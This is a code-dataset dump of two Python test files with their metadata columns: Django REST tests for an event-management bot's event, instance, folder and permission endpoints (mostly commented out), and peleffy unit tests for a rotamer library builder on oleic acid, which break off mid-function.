| 0.366774
| 1
| 0.090289
| false
| 0
| 0.001204
| 0.000803
| 0.093098
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1e7deeaac14b4b83a97ab93772ad4ccfbd922132
| 28,592
|
py
|
Python
|
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | 6
|
2021-06-28T07:23:15.000Z
|
2021-07-22T12:59:33.000Z
|
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
import json
import datetime
from lms.signals import Signals
from re import S
from typing import OrderedDict
from unittest.mock import MagicMock
from django.utils import timezone
from django.urls import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from lms.models.event_models import Event, EventInstance, EventInstanceFolder, EventInstanceFolderPermissions
from lms.models.user_models import User
from lms.tests.helper_functions import login
from lms.utils.drive_service import GDriveService
from django.db.models import signals
# class GetEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.user, self.client = login()
# def test_get_specific_event(self):
# Event.objects.create(**self.validPayload)
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_event_list_pagination(self):
# for n in range(51):
# payload = self.validPayload
# payload["eventCode"] += str(n)
# Event.objects.create(**payload)
# response = self.client.get(
# reverse("event-view")
# )
# self.assertEqual(len(response.data["results"]), 15)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class CreateEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.invalidPayload = {
# "eventCode": "",
# "name": "invalidTestEvent",
# "description": "This is my description"
# }
# self.user, self.client = login()
# def test_create_valid_event(self):
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# proposed_response = response.data
# del proposed_response['id']
# self.assertDictEqual(self.validPayload, proposed_response)
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_invalid_event_no_event_code(self):
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.invalidPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# def test_create_duplicated_event(self):
# Event.objects.create(**self.validPayload)
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# class UpdateEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.updatedPayload = {
# "eventCode": "T101",
# "name": "updatedTestEvent",
# "description": "This is my description"
# }
# self.user, self.client = login()
# self.testEvent = Event.objects.create(**self.validPayload)
# def test_update_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# proposedResponse = response.data
# del proposedResponse['id']
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertDictEqual(self.updatedPayload, proposedResponse)
# def test_update_invalid_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T102"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class DeleteEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.user, self.client = login()
# self.testEvent = Event.objects.create(**self.validPayload)
# def test_delete_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# def test_delete_invalid_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T102"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class GetEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# testEvent = Event.objects.create(
# eventCode="T101", name="testEvent1", description="This is my description")
# self.validPayload = {
# "eventInstanceCode": "Test101",
# "startDate": timezone.now(),
# "endDate": timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# self.user, self.client = login()
# self.testEventInstance = EventInstance.objects.create(
# **self.validPayload)
# def test_get_specific_event_instance_by_event_instance_code(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_invalid_event_instance_code(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# def test_get_specific_event_instance_by_event_code(self):
# url = f"{reverse('event-instance-view')}?event=Test101"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_isCompleted(self):
# url = f"{reverse('event-instance-view')}?isCompleted=False"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_invalid_event_code(self):
# url = f"{reverse('event-instance-view')}?event=Invalid"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 0)
# def test_get_event_instance_list(self):
# response = self.client.get(
# reverse("event-instance-view")
# )
# self.assertEqual(response.data.get("count"), 1)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
class CreateEventInstanceViewTest(APITestCase):
def setUp(self):
Event.objects.create(eventCode="T101", name="testEvent1",
description="This is my description")
self.validPayload = {
"eventCode": "T101",
"eventInstanceCode": "Test101",
"startDate": str(timezone.now()),
"endDate": str(timezone.now() + datetime.timedelta(days=10)),
"location": "somewhere",
"dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
"isCompleted": "True",
"fee": 0
}
self.user, self.client = login()
def test_create_valid_event_instance(self):
Signals.createFolderCallback = MagicMock()
url = reverse('event-instance-view')
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).exists(), True)
def test_create_event_instance_invalid_eventCode(self):
Signals.createFolderCallback = MagicMock()
url = reverse('event-instance-view')
self.validPayload["eventCode"] = "T102"
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).exists(), False)
def test_create_event_instance_existing_eventInstanceCode(self):
Signals.createFolderCallback = MagicMock()
validPayload = self.validPayload.copy()
del validPayload["eventCode"]
EventInstance.objects.create(**validPayload)
url = reverse('event-instance-view')
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).count(), 1)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# class DeleteEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# Event.objects.create(eventCode="T101", name="testEvent1",
# description="This is my description")
# self.validPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "True",
# "fee": 0
# }
# self.user, self.client = login()
# validPayload = self.validPayload.copy()
# del validPayload["eventCode"]
# self.testEventInstance = EventInstance.objects.create(**validPayload)
# def test_update_valid_event_instance(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# def test_delete_invalid_event_instance(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class UpdateEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# Event.objects.create(eventCode="T101", name="testEvent1",
# description="This is my description")
# self.validPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "True",
# "fee": 0,
# }
# self.updatedPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "False",
# "fee": 0
# }
# self.user, self.client = login()
# validPayload = self.validPayload.copy()
# del validPayload["eventCode"]
# self.testEventInstance = EventInstance.objects.create(**validPayload)
# def test_update_valid_event_instance(self):
# Signals.create_folder = MagicMock()
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# Signals.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_update_invalid_event_instance(self):
# Signals.create_folder = MagicMock()
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# Signals.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class GetEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# eventInstance1 = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode1",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId1",
# folderName="someFolderName1",
# eventInstance=eventInstance1
# )
# self.expectedOutput = {
# "folderId": "someTestId",
# "folderName": "someFolderName",
# "eventInstance": "someEventInstanceCode"
# }
# # TODO: Create permissions and put into EventInstanceFolder to see if can see
# def test_get_list_of_event_instance_folders(self):
# url = reverse('event-instance-folder-view')
# response = self.client.get(url)
# proposedOutput = response.data["results"][0]
# del proposedOutput['id']
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 2)
# self.assertDictEqual(proposedOutput, self.expectedOutput)
# def test_filter_list_of_event_instance_from_event_instance(self):
# url = f"{reverse('event-instance-folder-view')}?eventInstance=someEventInstanceCode"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
# class PostEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# self.event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# self.eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=self.event
# )
# def test_create_valid_folder(self):
# GDriveService.create_folder = MagicMock(return_value="testId")
# url = reverse('event-instance-folder-view')
# validPayload = {
# "folderName": "testName",
# "eventInstanceCode": "someEventInstanceCode"
# }
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.create_folder.assert_called_once()
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_will_not_create_duplicate_folder_and_return_bad_request(self):
# GDriveService.create_folder = MagicMock(return_value="someFolderId")
# EventInstanceFolder.objects.create(
# folderId="someFolderId",
# folderName="someFolderName",
# eventInstance=self.eventInstance
# )
# validPayload = {
# "folderName": "someFolderName",
# "eventInstanceCode": "someEventInstanceCode"
# }
# url = reverse('event-instance-folder-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# class DeleteEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# def test_delete_folder(self):
# GDriveService.delete_file_or_folder = MagicMock()
# url = reverse('event-instance-folder-view',
# kwargs={'folderId': 'someTestId'})
# response = self.client.delete(url)
# folderExist = EventInstanceFolder.objects.filter(
# folderId='someTestId').exists()
# GDriveService.delete_file_or_folder.assert_called_once_with(
# 'someTestId')
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# self.assertEqual(folderExist, False)
# def test_delete_non_existant_folder(self):
# GDriveService.delete_file_or_folder = MagicMock()
# url = reverse('event-instance-folder-view',
# kwargs={'folderId': 'someIncorrectTestId'})
# response = self.client.delete(url)
# folderExist = EventInstanceFolder.objects.filter(
# folderId='someTestId').exists()
# GDriveService.delete_file_or_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# self.assertEqual(folderExist, True)
# class GetEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# folder = EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId',
# user=self.user,
# folderRole="reader"
# )
# permission.folder.add(folder)
# user2 = User.objects.create(
# username="someUsername",
# email="someEmail@gmail.com",
# password="somePassword",
# first_name="someFirstName",
# last_name="someLastName"
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId2',
# user=user2,
# folderRole="reader"
# )
# permission.folder.add(folder)
# def test_get_list_of_permissions(self):
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 2)
# def test_get_filtered_list_of_permissions(self):
# url = f"{reverse('event-instance-folder-permissions-view')}?user=yankai14&folder=someTestId"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 1)
# class CreateEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# def test_create_permission(self):
# GDriveService.give_permission = MagicMock(return_value="testId")
# validPayload = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.give_permission.assert_called_once_with(
# fileId='someTestId', role='reader', granteeEmail='limyk2014@gmail.com')
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_duplicate_permission(self):
# GDriveService.give_permission = MagicMock(return_value="testId")
# validPayload = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# url = reverse('event-instance-folder-permissions-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# validPayloadDuplicate = {
# "folderId": "someTestId",
# "folderRole": "reader",
# "username": self.user.username
# }
# response = self.client.post(
# url,
# data=json.dumps(validPayloadDuplicate),
# content_type="application/json"
# )
# self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
# class DeleteEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# folder = EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId',
# user=self.user,
# folderRole="reader"
# )
# permission.folder.add(folder)
# def test_delete_permission(self):
# GDriveService.delete_permission = MagicMock()
# url = reverse('event-instance-folder-permissions-view', kwargs={
# 'eventInstanceCode': 'someEventInstanceCode', 'username': self.user.username})
# response = self.client.delete(url)
# permissionExist = EventInstanceFolderPermissions.objects.filter(
# folder__eventInstance__eventInstanceCode='eventInstanceCode').exists()
# GDriveService.delete_permission.assert_called_once_with(
# 'someTestId', 'testId')
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# self.assertEqual(permissionExist, False)
# def test_delete_non_existent_permission(self):
# GDriveService.delete_permission = MagicMock()
# url = reverse('event-instance-folder-permissions-view', kwargs={
# 'eventInstanceCode': 'wrongEventInstanceCode', 'username': self.user.username})
# response = self.client.delete(url)
# permissionExist = EventInstanceFolderPermissions.objects.filter(
# permissionId='testId').exists()
# GDriveService.delete_permission.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# self.assertEqual(permissionExist, True)
| 35.695381
| 109
| 0.59744
| 2,592
| 28,592
| 6.450231
| 0.087191
| 0.044859
| 0.057779
| 0.062444
| 0.81859
| 0.784198
| 0.774568
| 0.750763
| 0.734733
| 0.719481
| 0
| 0.014423
| 0.27735
| 28,592
| 800
| 110
| 35.74
| 0.794744
| 0.846775
| 0
| 0.338235
| 0
| 0
| 0.080388
| 0
| 0
| 0
| 0
| 0.00125
| 0.102941
| 1
| 0.058824
| false
| 0
| 0.220588
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94b9d0ca11a8b028dae2c4e9902577003226c142
| 14,823
|
py
|
Python
|
peleffy/tests/test_rotamers.py
|
frumpowy/peleffy
|
9b6110a9bf50bedd8e299271a8ff9c3b79339e63
|
[
"MIT"
] | 9
|
2020-11-16T15:07:23.000Z
|
2022-03-10T12:48:20.000Z
|
peleffy/tests/test_rotamers.py
|
NBDsoftware/peleffy
|
d0ca27a366f74b097aac450451f2ad47a3a3f5c8
|
[
"MIT"
] | 75
|
2020-11-02T18:49:08.000Z
|
2022-03-15T16:41:26.000Z
|
peleffy/tests/test_rotamers.py
|
NBDsoftware/peleffy
|
d0ca27a366f74b097aac450451f2ad47a3a3f5c8
|
[
"MIT"
] | 5
|
2020-12-02T16:00:44.000Z
|
2021-09-08T11:11:30.000Z
|
"""
This module contains the tests to check the peleffy's rotamer library
builder.
"""
import pytest
from peleffy.utils import get_data_file_path
from peleffy.topology import Molecule
class TestMolecularGraph(object):
"""
It wraps all tests that check the MolecularGraph class.
"""
def test_rotamer_library_builder(self):
"""
It tests the rotamer library builder.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
molecule = Molecule(ligand_path, exclude_terminal_rotamers=False)
# rotamer_library = RotamerLibrary(molecule)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18]), set([18, 19])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_terminal_rotamer_filtering(self):
"""
It tests the rotamer library builder when the terminal rotatable bonds
are ignored.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
molecule = Molecule(ligand_path, exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_rotamer_core_constraint(self):
"""
It tests the rotamer library builder when constraining its core
to contain a specific atom.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
# Test atom index constraint
molecule = Molecule(ligand_path, core_constraints=[19, ],
exclude_terminal_rotamers=False)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([18, 19]), set([17, 18]), set([16, 17]),
set([15, 16]), set([14, 15]), set([13, 14]),
set([12, 13]), set([11, 12]), set([9, 10]),
set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test PDB atom name constraint
molecule = Molecule(ligand_path, core_constraints=[' C18', ],
exclude_terminal_rotamers=False)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([18, 19]), set([17, 18]), set([16, 17]),
set([15, 16]), set([14, 15]), set([13, 14]),
set([12, 13]), set([11, 12]), set([9, 10]),
set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test core constraint with terminal exclusion
molecule = Molecule(ligand_path, core_constraints=[' C18', ],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 1, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list = list()
for rotamer in rotamers_per_branch[0]:
atom_list.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES = [set([17, 18]), set([16, 17]), set([15, 16]),
set([14, 15]), set([13, 14]), set([12, 13]),
set([11, 12]), set([9, 10]), set([8, 9]),
set([7, 8]), set([6, 7]), set([5, 6]),
set([2, 5]), set([0, 2]), set([0, 1])]
assert len(atom_list) == len(EXPECTED_INDICES), "Unexpected " + \
"number of rotamers"
assert all(atom_pair in EXPECTED_INDICES for atom_pair in atom_list), \
"Invalid rotamer library"
# Test core constraint with a central core
molecule = Molecule(ligand_path, core_constraints=[' C9 ', ],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([9, 10]), set([8, 9]), set([7, 8]),
set([6, 7]), set([5, 6]), set([2, 5]),
set([0, 2]), set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
